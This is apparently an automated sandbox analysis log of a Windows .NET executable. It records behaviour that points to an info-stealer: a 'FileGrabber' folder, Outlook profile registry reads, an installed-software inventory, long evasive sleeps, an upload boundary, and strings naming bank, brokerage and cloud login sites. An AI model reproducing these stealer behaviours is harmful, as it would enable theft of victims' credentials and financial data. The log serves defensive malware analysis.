Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: userenv.dll	Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

File written: C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: vEtDFkAZjO.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: vEtDFkAZjO.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: vEtDFkAZjO.exe, 00000000.00000002.1618907198.0000000006180000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0101B2B0 pushad ; iretd	0_2_0101B2B1
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0132A288 push esp; iretd	0_2_0132A289
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0596E6F8 push EC064EAAh; iretd	0_2_0596E6FD
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0596BDDA push eax; retf	0_2_0596BDE9

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

File created: C:\Users\user\AppData\Local\138727\InstalledSoftware.txt

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Memory allocated: 1010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Memory allocated: 2C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Memory allocated: 1270000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Code function: 0_2_01330DD0 rdtsc

0_2_01330DD0

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599843	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599733	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599384	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599090	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598933	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598809	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598374	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597825	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597697	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597144	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596634	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596526	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596379	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596261	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596044	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595918	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595811	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595702	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595588	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595372	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595154	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594717	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594608	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594498	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594390	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594171	Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Window / User API: threadDelayed 3847			Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Window / User API: threadDelayed 5879			Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -37815825351104557s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -599843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -599733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -599515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -599384s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -599090s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598933s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598809s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -598046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597825s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597697s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597144s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -596634s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -596526s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -596379s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -596261s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -596044s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595918s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595811s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595588s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595372s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595154s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -595046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -594717s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -594608s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -594498s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -594390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -594281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe TID: 1176	Thread sleep time: -594171s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599843	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599733	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599384	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 599090	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598933	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598809	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598374	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597825	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597697	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597144	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596634	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596526	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596379	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596261	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 596044	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595918	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595811	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595702	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595588	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595372	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595154	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594717	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594608	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594498	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594390	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Thread delayed: delay time: 594171	Jump to behavior

Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: vEtDFkAZjO.exe, 00000000.00000002.1611814009.0000000000E91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd2a1a13562e73<
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
